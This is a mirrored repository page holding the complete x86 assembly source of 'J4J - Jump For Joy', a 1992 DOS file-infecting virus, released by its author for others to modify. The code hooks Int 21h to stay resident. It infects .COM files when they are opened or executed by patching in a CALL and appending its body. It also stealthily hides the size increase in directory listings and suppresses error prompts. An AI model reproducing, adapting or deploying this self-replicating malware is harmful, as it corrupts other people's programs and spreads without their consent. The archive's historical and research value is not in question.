mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-22 01:58:51 +00:00
4b9382ddbc
push
909 lines
16 KiB
NASM
909 lines
16 KiB
NASM
;J4J - Jump For Joy, released 31 Jan 92, (c) Charlie of Demoralized Youth
|
||
;------------------------------------------------------------------------
|
||
;This source has been lying around for a veeeeeery long time, and I will
|
||
;*NOT* continue to make newer versions of J4J, so that is the reason
|
||
;why I release the source.
|
||
;
|
||
;It's been 'bout a month since my last glance on it, so it's maybe full
|
||
;of bugs, but anyways; assemble with A86
|
||
;
|
||
;Some idea's were taken from Omicron / FLIP B (Just the startup), but
|
||
;the rest was done by CHARLIE of DEMORALIZED YOUTH!
|
||
;
|
||
;Fuck this code up however you like...
|
||
|
||
tsr_bytes equ 1024
|
||
tsr_para equ (4096 / 16)
|
||
|
||
cpt1 equ $
|
||
|
||
mov ax,1991
|
||
mov bx,ax
|
||
mov cx,ax
|
||
add ax,13881
|
||
int 21h
|
||
cmp ax,cx
|
||
je fail
|
||
|
||
cmp sp,-10h
|
||
jb fail
|
||
|
||
mov ax,cs
|
||
dec ax
|
||
mov es,ax
|
||
cmp byte es:[0000h],'Z'
|
||
jne fail
|
||
|
||
mov ax,es:[0003h]
|
||
sub ax,tsr_para
|
||
jc fail
|
||
|
||
mov es:[0003h],ax
|
||
sub word ptr es:[0012h],tsr_para
|
||
mov es,es:[0012h]
|
||
|
||
call $+3
|
||
|
||
cpt3 equ $
|
||
|
||
pop si
|
||
mov bx,si
|
||
sub si,(cpt3-cpt1)
|
||
add si,(cpt4-cpt1)
|
||
push cs
|
||
push si
|
||
|
||
mov si,bx
|
||
sub si,(cpt3-cpt1)
|
||
mov cx,offset total-100h
|
||
mov di,100h
|
||
push es
|
||
rep movsb
|
||
mov di,17Dh+2
|
||
push di
|
||
|
||
retf
|
||
cpt4 equ $
|
||
|
||
fail:
|
||
mov ax,100h
|
||
push ax
|
||
xor ax,ax
|
||
xor bx,bx
|
||
xor cx,cx
|
||
xor dx,dx
|
||
xor si,si
|
||
xor di,di
|
||
xor bp,bp
|
||
push cs
|
||
push cs
|
||
pop es
|
||
pop ds
|
||
mov word [100h],20CDh
|
||
rpl1 equ $-2
|
||
mov byte [102h],90h
|
||
rpl2 equ $-1
|
||
ret
|
||
|
||
cpt2 equ $
|
||
|
||
|
||
jmp init
|
||
|
||
|
||
fcb_open dw offset fcb_open_cont
|
||
exec dw offset back
|
||
open_handle dw offset back
|
||
|
||
new_int_21:
|
||
pushf
|
||
|
||
cmp ah,0Fh ;open file using FCB's
|
||
jne not_open_fcb
|
||
|
||
call fcb_to_asciiz
|
||
push dx
|
||
push ds
|
||
|
||
push cs
|
||
pop ds
|
||
mov dx,offset file
|
||
|
||
push cs:[fcb_open]
|
||
jmp file_main
|
||
|
||
fcb_open_cont:
|
||
pop ds
|
||
pop dx
|
||
jmp back
|
||
|
||
not_open_fcb:
|
||
;cmp ah,4Eh
|
||
;je handle_dir
|
||
;cmp ah,4Fh
|
||
;je handle_dir
|
||
|
||
cmp ah,11h
|
||
je fcb_dir
|
||
cmp ah,12h
|
||
je fcb_dir
|
||
|
||
cmp ah,3Eh
|
||
jne clodd
|
||
cmp bx,1991
|
||
jne clodd
|
||
xchg ax,bx
|
||
popf
|
||
iret
|
||
|
||
clodd:
|
||
cmp ah,3Dh
|
||
jne last_chance
|
||
push cs:[open_handle]
|
||
jmp file_main
|
||
|
||
last_chance:
|
||
cmp ax,4B00h
|
||
jne back
|
||
|
||
push cs:[exec]
|
||
jmp file_main
|
||
|
||
back:
|
||
popf
|
||
db 0EAh
|
||
old_int_21 dw 0,0
|
||
|
||
handle_dir:
|
||
popf
|
||
call int21
|
||
|
||
pushf
|
||
jnc back_handle_dir
|
||
|
||
cmp ax,0
|
||
jne back_handle_dir
|
||
|
||
call stealth_dir_handle
|
||
sti
|
||
|
||
back_handle_dir:
|
||
popf
|
||
iret
|
||
|
||
fcb_dir:
|
||
popf
|
||
call int21
|
||
|
||
pushf
|
||
cmp al,00h
|
||
jne back_fcb_dir
|
||
|
||
call stealth_dir_fcb
|
||
sti
|
||
|
||
back_fcb_dir:
|
||
popf
|
||
iret
|
||
|
||
fcb_fname equ 80h+1
|
||
fcb_fext equ 80h+1+8
|
||
|
||
f_attr equ 80h+15h
|
||
f_time equ 80h+16h
|
||
f_date equ 80h+18h
|
||
f_size equ 80h+1Ah
|
||
f_asciiz equ 80h+1Eh
|
||
|
||
f_handle equ 80h
|
||
f_head_buffer equ 80h+2
|
||
f_tail_buffer equ 80h-3
|
||
f_type equ 80h+6
|
||
|
||
|
||
repl0: db 0E8h,?,? ;call ????
|
||
|
||
;repl1: db 0C7h,6,0,1,?,? ;mov word [0100h],????
|
||
; db 0C6h,6,2,1,? ;mov byte [0102h],??
|
||
|
||
repl2: push bp
|
||
mov bp,sp
|
||
sub word [bp+2],3
|
||
pop bp
|
||
|
||
repl3:
|
||
|
||
|
||
db 'Elo<6C>, Elo<6C>, lam<61> sabakt<6B>ni?'
|
||
|
||
file_main:
|
||
pushf
|
||
;call other_file_type_check
|
||
;jnc file_main_pr1
|
||
jmp file_main_pr1
|
||
|
||
popf
|
||
jmp back
|
||
|
||
file_main_pr1:
|
||
push ax
|
||
push bx
|
||
push cx
|
||
push dx
|
||
push si
|
||
push di
|
||
push bp
|
||
push es
|
||
push ds
|
||
|
||
push cs
|
||
pop es
|
||
|
||
mov si,dx
|
||
mov di,offset file
|
||
cld
|
||
mov cx,65
|
||
rep movsb
|
||
|
||
push cs
|
||
pop ds
|
||
|
||
call setup_24
|
||
|
||
;call cpu_check
|
||
;cmp ax,1
|
||
;je file_slutt
|
||
|
||
call file_info_get
|
||
jc file_is_done
|
||
|
||
call mekke_fil
|
||
|
||
file_is_done:
|
||
call file_info_set
|
||
|
||
file_slutt:
|
||
|
||
call rest_24
|
||
|
||
pop ds
|
||
pop es
|
||
pop bp
|
||
pop di
|
||
pop si
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
popf
|
||
ret ;jmp back
|
||
|
||
file db 65 dup(0)
|
||
|
||
old_dta dw ?,?
|
||
|
||
file_info_get:
|
||
mov ah,2Fh ;get DTA address
|
||
call int21
|
||
mov old_dta[2],es
|
||
mov old_dta[0],bx
|
||
mov ah,1Ah ;set DTA address
|
||
push cs
|
||
pop ds
|
||
mov dx,80h
|
||
call int21
|
||
|
||
mov ah,4Eh ;FIND FIRST (get info about
|
||
mov cx,1+2+32 ;our file)
|
||
mov dx,offset file
|
||
call int21
|
||
jnc file_info_get_ok
|
||
stc
|
||
ret
|
||
|
||
stc
|
||
ret
|
||
file_info_get_ok:
|
||
clc
|
||
|
||
test word [f_attr],4 ;is the System attr. set?
|
||
jnz offset file_info_get_ok-2 ;yeah, so don't do it..
|
||
|
||
cmp word [fcb_fname],'OC' ;like in: COmmand.com
|
||
je offset file_info_get_ok-2 ;the command-interpreter
|
||
|
||
cmp word [fcb_fname],'BI' ;like in: IBmbio.com and IBmdos.com
|
||
je offset file_info_get_ok-2 ;the startup files for IBM-dos
|
||
|
||
cmp word [fcb_fext],'YS' ;like in: country.SYs
|
||
je offset file_info_get_ok-2 ;device drivers and .SYS files
|
||
|
||
mov ax,4301h ;set attribute
|
||
xor cx,cx ;attr=0
|
||
mov dx,offset file
|
||
call int21
|
||
|
||
mov ax,3D02h ;open file
|
||
mov dx,offset file
|
||
call int21
|
||
jnc fig_open
|
||
fig_fail:
|
||
stc
|
||
ret
|
||
fig_open:
|
||
mov [f_handle],ax
|
||
|
||
mov bx,ax
|
||
mov ah,3Fh ;read from file
|
||
mov cx,3 ;3 bytes
|
||
mov dx,f_head_buffer
|
||
call int21
|
||
jnc fig_read
|
||
jmp fig_fail
|
||
|
||
fig_read:
|
||
cmp ax,3
|
||
jne fig_fail
|
||
|
||
mov ax,4200h
|
||
xor cx,cx
|
||
mov dx,[f_size]
|
||
sub dx,3
|
||
mov bx,[f_handle]
|
||
call int21
|
||
|
||
mov ah,3Fh
|
||
mov cx,3
|
||
mov dx,f_tail_buffer
|
||
call int21
|
||
|
||
cmp word [f_size+2],0
|
||
|
||
jnz fig_fail
|
||
cmp [f_size],60000
|
||
ja fig_fail
|
||
|
||
cmp word [f_head_buffer],'MZ' ;EXE 'ZM' ?
|
||
je file_is_exe
|
||
cmp word [f_head_buffer],'ZM' ;EXE 'MZ' ?
|
||
je file_is_exe
|
||
cmp word [f_head_buffer],-1 ;Device Driver ?
|
||
je fig_fail
|
||
|
||
mov byte [f_type],0 ;filetype = COM
|
||
clc
|
||
ret
|
||
file_is_exe:
|
||
mov byte [f_type],1 ;filetype = EXE
|
||
clc
|
||
ret
|
||
|
||
file_info_set:
|
||
mov ah,1Ah ;set DTA address
|
||
mov dx,old_dta[0]
|
||
mov bx,old_dta[2]
|
||
mov ds,bx
|
||
call int21
|
||
|
||
push cs
|
||
pop ds
|
||
|
||
mov ax,4301h ;restore ATTRibutes
|
||
mov cx,[f_attr]
|
||
mov dx,offset file
|
||
call int21
|
||
|
||
mov ax,5701h ;restore DATE & TIME
|
||
mov bx,[f_handle]
|
||
mov cx,[f_time]
|
||
and cl,255-31
|
||
or cl,30
|
||
mov dx,[f_date]
|
||
call int21
|
||
|
||
mov ah,3Eh ;close file
|
||
mov bx,[f_handle]
|
||
call int21
|
||
ret
|
||
|
||
db '<27><><EFBFBD>--?!?'
|
||
|
||
mekke_fil:
|
||
cmp [f_size],1023
|
||
ja not_one_n0
|
||
stc
|
||
ret
|
||
|
||
not_one_n0:
|
||
cmp byte ptr [f_type],0
|
||
je not_one_n1
|
||
stc
|
||
ret
|
||
|
||
not_one_n1:
|
||
cmp word ptr [f_tail_buffer],'4J'
|
||
jne not_one
|
||
stc
|
||
ret
|
||
|
||
not_one:
|
||
mov ax,[f_size] ;calculate CALL
|
||
sub ax,3 ;length
|
||
mov repl0[1],ax
|
||
|
||
mov ax,word [f_head_buffer]
|
||
mov bl,byte [f_head_buffer]+2
|
||
|
||
mov [offset rpl1],ax
|
||
mov [offset rpl2],bl
|
||
; mov word ptr repl1[4],ax ;restore orig bytes
|
||
; mov repl1[10],bl ;after CALL...
|
||
|
||
mov ax,4200h ;seek to file_start
|
||
mov bx,[f_handle]
|
||
xor cx,cx
|
||
mov dx,cx
|
||
call int21
|
||
|
||
mov ah,40h ;write CALL XXXX
|
||
mov bx,[f_handle]
|
||
mov cx,3 ;3 bytes
|
||
mov dx,offset repl0
|
||
call int21
|
||
|
||
mov ax,4202h ;seek to EOF
|
||
mov bx,[f_handle]
|
||
xor cx,cx
|
||
mov dx,cx
|
||
call int21
|
||
|
||
; mov ah,40h ;write startup-code
|
||
; mov bx,[f_handle]
|
||
; mov cx,(offset repl3)-offset repl1
|
||
; ;???? bytes
|
||
; mov dx,offset repl1
|
||
; call int21
|
||
; jc replace_them_now
|
||
|
||
mov ah,40h ;write main code
|
||
mov bx,[f_handle]
|
||
mov cx,offset total-100h
|
||
mov dx,100h
|
||
call int21
|
||
jc $+2+1+1
|
||
clc
|
||
ret
|
||
|
||
replace_them_now:
|
||
mov ax,4200h ;seek to beginning
|
||
mov bx,[f_handle] ;of the file
|
||
xor cx,cx
|
||
mov dx,cx
|
||
call int21
|
||
|
||
mov ah,40h ;error, so write
|
||
mov bx,[f_handle] ;back 3 first bytes
|
||
mov cx,3
|
||
mov dx,f_head_buffer
|
||
call int21
|
||
stc
|
||
ret
|
||
|
||
|
||
db 'Charlie says: Support ()DEMORALIZED YOUTH() '
|
||
|
||
;;*************************************************************
|
||
;;* CPU checker, coded by Data Disruptor / RABiD Nat'nl Corp. *
|
||
;;*************************************************************
|
||
;cpu_check:
|
||
; xor ax,ax
|
||
; push ax
|
||
; popf
|
||
; pushf
|
||
; pop ax
|
||
; and ax,0f000h
|
||
; cmp ax,0f000h
|
||
; je mc_8086
|
||
; mov ax,0f000h
|
||
; push ax
|
||
; popf
|
||
; pushf
|
||
; pop ax
|
||
; and ax,0f000h
|
||
; jz mc_80286
|
||
; mov ax,3
|
||
; ret
|
||
;mc_80286:
|
||
; mov ax,2
|
||
; ret
|
||
;mc_8086:
|
||
; mov ax,1
|
||
; ret
|
||
|
||
|
||
;***************************************
|
||
;
|
||
; Call previously saved Int 21h Handler
|
||
;
|
||
;***************************************
|
||
int21:
|
||
pushf
|
||
call dword ptr cs:old_int_21
|
||
ret
|
||
|
||
;**********************************************
|
||
;
|
||
; Int 24h (Critical Error Handler) Code & Data
|
||
;
|
||
;**********************************************
|
||
err dw 0
|
||
|
||
old_24 dw ?,?
|
||
new_24: inc cs:err
|
||
mov al,0
|
||
stc
|
||
iret
|
||
|
||
;****************************************************************
|
||
;
|
||
; Fix so that Int 24h (Critical Error Handler) won't display the
|
||
; "abort, retry, fail?" message
|
||
;
|
||
;****************************************************************
|
||
setup_24:
|
||
xor ax,ax
|
||
mov ds,ax
|
||
|
||
les bx,[24h*4]
|
||
|
||
push cs
|
||
pop ds
|
||
|
||
mov word ptr old_24[0],bx
|
||
mov word ptr old_24[2],es
|
||
|
||
mov ds,ax
|
||
mov word ptr [24h*4],offset new_24
|
||
mov word ptr [24h*4+2],cs
|
||
|
||
push cs
|
||
push cs
|
||
pop es
|
||
pop ds
|
||
ret
|
||
|
||
;**********************************************************
|
||
;
|
||
; Restore original Int 24h (Critical Error Handler) vector
|
||
;
|
||
;**********************************************************
|
||
rest_24:
|
||
les bx,cs:old_24
|
||
|
||
xor ax,ax
|
||
mov ds,ax
|
||
|
||
mov word ptr [24h*4],bx
|
||
mov word ptr [24h*4+2],es
|
||
|
||
push cs
|
||
pop ds
|
||
ret
|
||
|
||
|
||
;*********************************************************
|
||
;
|
||
; Check if the filename has got an extension of .COM or
|
||
; .EXE. Returns with CY if not a valid filetype, or NC if
|
||
; it is a valid one.
|
||
;
|
||
;*********************************************************
|
||
other_fail:
|
||
pop bp
|
||
pop ds
|
||
pop es
|
||
pop di
|
||
pop si
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
popf
|
||
stc ;return with CY
|
||
ret
|
||
|
||
other_file_type_check: ;here the main routine starts
|
||
pushf
|
||
push ax
|
||
push bx
|
||
push cx
|
||
push dx
|
||
push si
|
||
push di
|
||
push es
|
||
push ds
|
||
push bp
|
||
|
||
mov di,dx
|
||
push ds
|
||
pop es
|
||
|
||
cld
|
||
mov cx,127
|
||
xor al,al
|
||
repnz scasb
|
||
jne other_fail
|
||
dec di
|
||
dec di
|
||
dec di
|
||
dec di
|
||
dec di
|
||
|
||
xchg si,di
|
||
lodsb
|
||
cmp al,'.'
|
||
jne other_fail
|
||
|
||
lodsw
|
||
and ax,0DFDFh
|
||
cmp ax,'OC'
|
||
je other_okfil
|
||
cmp ax,'XE'
|
||
je other_okfil
|
||
jmp other_fail
|
||
|
||
other_okfil:
|
||
lodsb
|
||
and al,0DFh
|
||
cmp al,'M'
|
||
je other_okfil2
|
||
cmp al,'E'
|
||
jne other_fail
|
||
|
||
other_okfil2:
|
||
pop bp
|
||
pop ds
|
||
pop es
|
||
pop di
|
||
pop si
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
popf
|
||
clc ;return with NC
|
||
ret
|
||
|
||
|
||
stealth_dir_handle:
|
||
jc done_stealthing_handle
|
||
|
||
pushf
|
||
push ax
|
||
push bx
|
||
push cx
|
||
push dx
|
||
push si
|
||
push di
|
||
push ds
|
||
push es
|
||
push bp
|
||
|
||
mov ah,2Fh
|
||
call int21
|
||
|
||
mov ax,word ptr es:[bx+16h]
|
||
mov ah,1Eh
|
||
and al,1Fh
|
||
cmp al,ah
|
||
jne done_stealthing_handle
|
||
|
||
cmp word es:[bx+1Ah+2],0
|
||
jne done_stealthing_handle
|
||
mov ax,word es:[bx+1Ah]
|
||
sub ax,(offset total)-100h
|
||
jc done_stealthing_handle
|
||
mov word es:[bx+1Ah],ax
|
||
|
||
done_stealthing_handle:
|
||
pop bp
|
||
pop es
|
||
pop ds
|
||
pop di
|
||
pop si
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
popf
|
||
ret
|
||
|
||
stealth_dir_fcb:
|
||
pushf
|
||
push ax
|
||
push bx
|
||
push cx
|
||
push dx
|
||
push si
|
||
push di
|
||
push ds
|
||
push es
|
||
push bp
|
||
|
||
mov ah,2Fh
|
||
call int21
|
||
|
||
; mov es,ds
|
||
; mov bx,dx
|
||
|
||
mov ax,word ptr es:[bx+14+10h] ;16h]
|
||
mov ah,30 ;1Eh
|
||
and al,31 ;1Fh
|
||
cmp al,ah
|
||
jne done_stealthing_fcb
|
||
|
||
cmp word es:[bx+22+10h],0 ;+10h+2],0
|
||
jne done_stealthing_fcb
|
||
|
||
mov ax,word es:[bx+20+10h] ;+10h]
|
||
sub ax,(offset total)-100h
|
||
jc done_stealthing_fcb
|
||
mov word es:[bx+20+10h],ax
|
||
|
||
done_stealthing_fcb:
|
||
pop bp
|
||
pop es
|
||
pop ds
|
||
pop di
|
||
pop si
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
popf
|
||
ret
|
||
|
||
|
||
|
||
|
||
init:
|
||
cli
|
||
push cs
|
||
push cs
|
||
pop ds
|
||
pop es
|
||
|
||
mov ax,3521h
|
||
int 21h
|
||
mov word ptr old_int_21[0],bx
|
||
mov word ptr old_int_21[2],es
|
||
mov dx,offset new_int_21
|
||
mov ax,2521h
|
||
int 21h
|
||
sti
|
||
|
||
retf
|
||
fcb_to_asciiz:
|
||
pushf
|
||
push ax
|
||
push cx
|
||
push si
|
||
push di
|
||
push es
|
||
|
||
push cs
|
||
pop es
|
||
mov di,offset file
|
||
|
||
cld
|
||
mov si,dx ;fcb_start
|
||
lodsb
|
||
cmp al,0
|
||
je fcb_in_current_dir
|
||
|
||
add al,'A'
|
||
stosb
|
||
mov al,':'
|
||
stosb
|
||
jmp anyway
|
||
|
||
fcb_in_current_dir:
|
||
inc si
|
||
|
||
anyway:
|
||
mov si,dx
|
||
inc si
|
||
mov cx,8
|
||
fcb_file_name_xfer:
|
||
lodsb
|
||
cmp al,' '
|
||
je fcb_done_1
|
||
stosb
|
||
loop fcb_file_name_xfer
|
||
|
||
fcb_done_1:
|
||
mov al,'.'
|
||
stosb
|
||
|
||
mov si,dx ;fcb_start
|
||
add si,1+8
|
||
mov cx,3
|
||
fcb_file_ext_xfer:
|
||
lodsb
|
||
cmp al,' '
|
||
je fcb_done_2
|
||
stosb
|
||
loop fcb_file_ext_xfer
|
||
|
||
fcb_done_2:
|
||
mov al,0
|
||
stosb
|
||
|
||
pop es
|
||
pop di
|
||
pop si
|
||
pop cx
|
||
pop ax
|
||
popf
|
||
ret
|
||
|
||
|
||
size dw (offset total)-100h
|
||
db 'J4J'
|
||
|
||
total:
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|